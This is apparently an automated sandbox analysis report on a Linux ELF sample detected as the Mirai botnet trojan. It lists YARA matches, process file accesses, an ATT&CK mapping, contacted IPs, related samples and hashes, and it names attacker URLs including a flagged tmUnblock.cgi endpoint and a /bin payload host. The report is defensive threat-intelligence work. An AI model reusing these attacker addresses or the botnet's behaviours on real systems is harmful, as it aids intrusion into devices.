Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26

Source: classification engine

Classification label: mal84.troj.linELF@0/0@0/0

Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1582/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2033/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1612/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1579/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1699/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1335/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1698/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2028/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1334/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1576/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2025/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2146/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/910/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/912/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/517/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/759/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/918/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1594/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1349/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1623/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/761/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1622/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/884/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1983/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2038/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1344/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1465/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1586/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1860/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1463/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2156/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/800/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/801/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1629/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1627/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1900/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/491/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2050/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1877/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/772/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1633/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1599/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1632/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/774/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1477/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/654/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/896/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1476/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1872/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2048/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/655/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1475/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/656/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/777/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/657/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/658/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/419/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/936/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1639/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1638/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1809/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1494/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1890/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2063/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2062/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1888/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1886/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/420/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1489/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/785/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1642/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/788/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/667/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/789/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1648/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2078/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2077/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2074/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/670/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/793/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1656/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1654/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/674/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1532/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/796/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/675/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/797/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/676/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/677/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2069/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2102/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/799/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2080/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2084/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2083/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1668/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1664/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1389/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/840/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/720/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2114/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/721/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/1661/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/2079/maps	Jump to behavior
Source: /tmp/86O41HaCl5.elf (PID: 6220)	File opened: /proc/847/maps	Jump to behavior

Source: /usr/bin/dash (PID: 6281)

Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.cQn9x2yAlZ /tmp/tmp.PRPRcDblVS /tmp/tmp.P0JqeoQ9qa

Jump to behavior

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 86O41HaCl5.elf, type: SAMPLE
Source: Yara match	File source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 86O41HaCl5.elf, type: SAMPLE
Source: Yara match	File source: 6216.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6214.1.0000000008048000.0000000008054000.r-x.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	Windows Management Instrumentation	Path Interception	Path Interception	1 File Deletion	1 OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Standard Port	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	3 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Scheduled Transfer	2 Ingress Tool Transfer			Data Encrypted for Impact	Server	Gather Victim Network Information

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
86O41HaCl5.elf	65%	Virustotal		Browse
86O41HaCl5.elf	76%	ReversingLabs	Linux.Trojan.Mirai
86O41HaCl5.elf	100%	Avira	EXP/ELF.Mirai.Bot.Hua.d
86O41HaCl5.elf	100%	Joe Sandbox ML

Name	Malicious	Antivirus Detection	Reputation
http://45.142.182.103:80/tmUnblock.cgi	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://45.142.182.103/bin	86O41HaCl5.elf	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
62.105.89.54	unknown	United Kingdom	5413	AS5413GB	false
134.187.82.27	unknown	United States	1226	CTA-42-AS1226US	false
210.27.122.247	unknown	China	4538	ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	false
70.49.63.167	unknown	Canada	577	BACOMCA	false
94.127.213.176	unknown	Jordan	9038	BAT-AS9038JO	false
42.163.127.173	unknown	China	4249	LILLY-ASUS	false
68.132.186.153	unknown	United States	701	UUNETUS	false
8.145.236.26	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
118.65.22.11	unknown	China	4713	OCNNTTCommunicationsCorporationJP	false
223.39.144.236	unknown	Korea Republic of	9644	SKTELECOM-NET-ASSKTelecomKR	false
50.210.56.2	unknown	United States	7922	COMCAST-7922US	false
72.245.30.69	unknown	United States	18566	MEGAPATH5-US	false
13.152.53.233	unknown	United States	7018	ATT-INTERNET4US	false
66.9.79.213	unknown	United States	18885	M2NGAGE2US	false
5.118.43.253	unknown	Iran (ISLAMIC Republic Of)	44244	IRANCELL-ASIR	false
102.241.140.238	unknown	Tunisia	36926	CKL1-ASNKE	false
38.140.102.25	unknown	United States	11272	TELEPAK-NETWORKS-INCUS	false
91.146.9.28	unknown	Russian Federation	3226	MARK-ITT-ASRU	false
53.125.154.140	unknown	Germany	31399	DAIMLER-ASITIGNGlobalNetworkDE	false
47.238.157.83	unknown	United States	20115	CHARTER-20115US	false
188.101.131.22	unknown	Germany	3209	VODANETInternationalIP-BackboneofVodafoneDE	false
71.100.23.213	unknown	United States	701	UUNETUS	false
86.163.72.2	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
157.139.31.177	unknown	United States	20252	JSIWMCUS	false
18.160.160.189	unknown	United States	3	MIT-GATEWAYSUS	false
47.51.66.64	unknown	United States	20115	CHARTER-20115US	false
128.227.72.91	unknown	United States	6356	NERDCNETUS	false
94.242.127.164	unknown	Czech Republic	30764	PODA-ASCZ	false
37.99.130.168	unknown	Saudi Arabia	47794	ATHEEB-ASSA	false
94.193.8.129	unknown	United Kingdom	5607	BSKYB-BROADBAND-ASGB	false
186.72.186.102	unknown	Panama	11556	CableWirelessPanamaPA	false
48.50.188.192	unknown	United States	2686	ATGS-MMD-ASUS	false
60.121.97.190	unknown	Japan	17676	GIGAINFRASoftbankBBCorpJP	false
37.111.12.128	unknown	Myanmar	133385	TELENORMYANMAR-ASTelenorMyanmarMM	false
196.45.136.172	unknown	Tanzania United Republic of	32860	CATS-NET-NETWORKTZ	false
4.21.66.170	unknown	United States	3356	LEVEL3US	false
188.4.37.239	unknown	Greece	1241	FORTHNET-GRForthnetEU	false
79.163.53.86	unknown	Poland	5617	TPNETPL	false
134.100.204.102	unknown	Germany	680	DFNVereinzurFoerderungeinesDeutschenForschungsnetzese	false
129.87.162.104	unknown	United States	26577	BAESYSTEMSUS	false
64.134.111.188	unknown	United States	14654	WAYPORTUS	false
105.15.211.60	unknown	South Africa	37168	CELL-CZA	false
185.46.45.203	unknown	Russian Federation	48467	PRANET-ASRU	false
167.234.70.183	unknown	United States	3525	ALBERTSONSUS	false
165.59.45.96	unknown	Zambia	37154	ZAMTELZM	false
57.95.244.198	unknown	Belgium	51964	ORANGE-BUSINESS-SERVICES-IPSN-ASNFR	false
89.221.71.216	unknown	Estonia	3249	ESTPAKEE	false
32.71.25.104	unknown	United States	2686	ATGS-MMD-ASUS	false
94.153.184.233	unknown	Ukraine	15895	KSNET-ASUA	false
142.35.86.163	unknown	Canada	3633	PROVINCE-OF-BRITISH-COLUMBIACA	false
212.36.111.43	unknown	United Kingdom	15699	AS_ADAMAdamDatacenterES	false
108.66.20.54	unknown	United States	7018	ATT-INTERNET4US	false
153.28.10.0	unknown	United States	6035	DNIC-ASBLK-05800-06055US	false
23.143.235.227	unknown	Reserved	26311	RANCH-WIFIUS	false
109.61.253.202	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
192.140.150.116	unknown	Pakistan	9541	CYBERNET-APCyberInternetServicesPvtLtdPK	false
79.51.179.130	unknown	Italy	3269	ASN-IBSNAZIT	false
18.153.210.97	unknown	United States	16509	AMAZON-02US	false
170.206.222.238	unknown	United States	11685	HNBCOL-ASUS	false
180.36.62.64	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
48.21.211.76	unknown	United States	2686	ATGS-MMD-ASUS	false
78.243.182.174	unknown	France	12322	PROXADFR	false
37.205.15.241	unknown	Czech Republic	24971	MASTER-ASCzechRepublicwwwmasterczCZ	false
79.164.236.167	unknown	Russian Federation	8615	CNT-ASMoscowRussiaRU	false
161.16.247.232	unknown	United States	19512	LYONDELLUS	false
79.45.108.70	unknown	Italy	3269	ASN-IBSNAZIT	false
121.105.26.128	unknown	Japan	2516	KDDIKDDICORPORATIONJP	false
79.250.222.118	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	false
114.124.221.227	unknown	Indonesia	23693	TELKOMSEL-ASN-IDPTTelekomunikasiSelularID	false
17.54.84.50	unknown	United States	714	APPLE-ENGINEERINGUS	false
212.225.90.62	unknown	United Kingdom	2529	DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide	false
66.233.205.164	unknown	United States	59371	DNC-ASDimensionNetworkCommunicationLimitedHK	false
151.111.130.165	unknown	United States	1998	STATE-OF-MNUS	false
149.20.37.20	unknown	United States	1280	ISC-AS-1280US	false
142.247.166.75	unknown	Saudi Arabia	25019	SAUDINETSTC-ASSA	false
135.82.210.102	unknown	United States	18676	AVAYAUS	false
172.115.149.251	unknown	United States	20001	TWC-20001-PACWESTUS	false
112.157.34.208	unknown	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	false
117.32.10.124	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
171.234.5.140	unknown	Viet Nam	7552	VIETEL-AS-APViettelGroupVN	false
104.156.177.71	unknown	United States	32391	SRCACCESSUS	false
49.71.77.4	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
148.157.94.122	unknown	United States	18715	NYPAUS	false
206.191.131.132	unknown	United States	12180	INTERNAP-2BLKUS	false
72.144.232.188	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
89.168.19.182	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
79.67.224.213	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
72.113.124.153	unknown	United States	22394	CELLCOUS	false
183.43.144.109	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
94.253.223.183	unknown	Croatia (LOCAL Name: Hrvatska)	31012	DCM-ASVipnetdooHR	false
157.162.207.134	unknown	Germany	22192	SSHENETUS	false
62.244.130.110	unknown	Poland	12741	AS-NETIAWarszawa02-822PL	false
93.54.44.180	unknown	Italy	12874	FASTWEBIT	false
132.112.199.134	unknown	United States	306	DNIC-ASBLK-00306-00371US	false
142.151.239.229	unknown	Canada	239	UTORONTO-ASCA	false
129.13.58.104	unknown	Germany	34878	KITKarlsruheInstituteofTechnologyDE	false
12.149.31.20	unknown	United States	7018	ATT-INTERNET4US	false
96.177.129.225	unknown	United States	7922	COMCAST-7922US	false
218.75.202.225	unknown	China	4134	CHINANET-BACKBONENo31Jin-rongStreetCN	false
109.117.223.97	unknown	Italy	30722	VODAFONE-IT-ASNIT	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
118.65.22.11	F3TJqL0vDs.elf	Get hash	malicious	Gafgyt, Mirai	Browse
134.187.82.27	x86-20230924-1250.elf	Get hash	malicious	Mirai	Browse
47.238.157.83	jRA66YUAW7	Get hash	malicious	Mirai	Browse
70.49.63.167	hZRc7G8wdL	Get hash	malicious	Gafgyt Mirai	Browse
94.127.213.176	66MALN3LSf	Get hash	malicious	Mirai	Browse
5.118.43.253	avxeC9Wssi	Get hash	malicious	Mirai	Browse
102.241.140.238	V8UELfQsju.elf	Get hash	malicious	Mirai	Browse
38.140.102.25	i686-20220501-2200	Get hash	malicious	Mirai Moobot	Browse
8.145.236.26	apep.x86	Get hash	malicious	Unknown	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CTA-42-AS1226US	Co8GEPjv8j.elf	Get hash	malicious	Mirai	Browse	156.41.210.113
	i586.elf	Get hash	malicious	Mirai	Browse	169.3.229.199
	vvV3pyLNs0.elf	Get hash	malicious	Mirai	Browse	156.41.113.140
	YEnJbXAPeu.elf	Get hash	malicious	Mirai	Browse	156.41.178.187
	m7Bm4mCkhy.elf	Get hash	malicious	Mirai	Browse	156.60.62.179
	2x40OMRCkY.elf	Get hash	malicious	Mirai	Browse	156.60.26.41
	RWCS3ICMHV.elf	Get hash	malicious	Unknown	Browse	67.156.52.81
	ua2cV1Y68W.elf	Get hash	malicious	Unknown	Browse	134.187.252.94
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	134.186.104.101
	idYcZwGPgA.elf	Get hash	malicious	Mirai	Browse	159.145.222.145
	oBtxppgLWB.elf	Get hash	malicious	Mirai	Browse	67.156.123.249
	ku1uI8KKoV.elf	Get hash	malicious	Unknown	Browse	153.50.25.39
	kuru.arm7.elf	Get hash	malicious	Unknown	Browse	156.41.203.42
	xxhFiiKSKy.elf	Get hash	malicious	Mirai	Browse	156.41.209.227
	Kb3RZ8k5pZ.elf	Get hash	malicious	Mirai	Browse	151.143.103.69
	mpsl.elf	Get hash	malicious	Unknown	Browse	67.156.76.56
	sora.mips.elf	Get hash	malicious	Mirai	Browse	67.157.161.27
	z0r0.x86.elf	Get hash	malicious	Mirai	Browse	156.41.209.236
	GntPlfffAN.elf	Get hash	malicious	Mirai	Browse	153.49.4.173
	x86.elf	Get hash	malicious	Mirai	Browse	67.157.136.42
AS5413GB	Ma4NfFTyMr.elf	Get hash	malicious	Mirai	Browse	109.170.250.172
	arm7-20231212-1319.elf	Get hash	malicious	Mirai	Browse	195.39.208.106
	28VknHmVIO.elf	Get hash	malicious	Mirai	Browse	62.232.92.98
	lyLTUlEEaD.elf	Get hash	malicious	Mirai	Browse	62.105.89.94
	rZDXrc6Qgj.elf	Get hash	malicious	Mirai	Browse	62.232.92.80
	ebQv2WFr7U.elf	Get hash	malicious	Mirai	Browse	62.44.89.197
	jdQ5Lxv5Nd.elf	Get hash	malicious	Mirai	Browse	80.69.132.193
	imaginebeingarm7.elf	Get hash	malicious	Mirai, Moobot	Browse	80.234.204.20
	BpSsm2RxvM.elf	Get hash	malicious	Mirai	Browse	62.232.92.80
	7vbrDg2AF5.elf	Get hash	malicious	Mirai	Browse	62.232.92.75
	5eFmWG76zz.elf	Get hash	malicious	Mirai	Browse	176.35.108.227
	mods.arm7.elf	Get hash	malicious	Mirai	Browse	62.105.89.60
	Eypxe2gysn.elf	Get hash	malicious	Mirai	Browse	62.44.89.194
	j5jq1GszFD.elf	Get hash	malicious	Mirai	Browse	62.232.92.73
	mM4FIrNQdC.elf	Get hash	malicious	Mirai	Browse	62.105.89.76
	wQb9yR6USY.elf	Get hash	malicious	Mirai	Browse	5.179.109.7
	FVShYxZJpc.elf	Get hash	malicious	Mirai	Browse	62.105.89.81
	n7BHnNF4CF.elf	Get hash	malicious	Mirai	Browse	94.30.52.202
	LFkxJbWFam.elf	Get hash	malicious	Mirai	Browse	94.30.52.236
	arm.elf	Get hash	malicious	Unknown	Browse	62.232.92.94
ERX-CERNET-BKBChinaEducationandResearchNetworkCenter	CuruFoiJiK.elf	Get hash	malicious	Mirai	Browse	210.27.122.200
	nig.arm7.elf	Get hash	malicious	Mirai	Browse	210.36.174.153
	arm4-20231216-1307.elf	Get hash	malicious	Mirai	Browse	49.53.12.71
	arm5-20231216-1200.elf	Get hash	malicious	Mirai	Browse	58.196.60.120
	arm7-20231215-0039.elf	Get hash	malicious	Mirai	Browse	42.244.91.140
	mips-20231212-1320.elf	Get hash	malicious	Mirai	Browse	118.202.90.2
	x86_64-20231212-1319.elf	Get hash	malicious	Mirai	Browse	211.81.11.237
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	58.192.13.166
	Vzqkkay7zK.elf	Get hash	malicious	Gafgyt, Mirai	Browse	210.35.196.38
	h7m0G9L0ut.elf	Get hash	malicious	Gafgyt, Mirai	Browse	210.44.105.9
	AjcelsaqC6.elf	Get hash	malicious	Gafgyt, Mirai	Browse	210.34.211.113
	x86.elf	Get hash	malicious	Unknown	Browse	111.114.154.200
	0hrV6HPP3E.elf	Get hash	malicious	Mirai	Browse	121.194.75.24
	HZHDPhGvrL.elf	Get hash	malicious	Mirai	Browse	222.16.133.54
	arm5.elf	Get hash	malicious	Mirai	Browse	58.202.129.248
	DIcHAJitgN.elf	Get hash	malicious	Unknown	Browse	202.242.60.206
	GvJmL3JXiO.elf	Get hash	malicious	Mirai	Browse	202.114.163.200
	khXfv5zuf7.elf	Get hash	malicious	Mirai	Browse	210.37.79.249
	uxGCUW9aFw.elf	Get hash	malicious	Mirai	Browse	222.24.201.134
	mUZS5TqzCm.elf	Get hash	malicious	Mirai	Browse	222.17.160.154

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.435218481766639
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	86O41HaCl5.elf
File size:	47'100 bytes
MD5:	77f6dbb4a1c2a1ca81d8f59fcc8f995d
SHA1:	4ab8d151665d721c48f94c6b870c31b999a94152
SHA256:	585014ced765a6632cd3ff845187e4c46d58955728e0ccd55952993500aa1642
SHA512:	ccc7e8083e2c4fcedb91b95321d20f662ffe879a09d29374a56e0edb00ce0ad0536be721e7360df9d3d64760b97c6db724eb084c68bc3073c31a0039e28c99c5
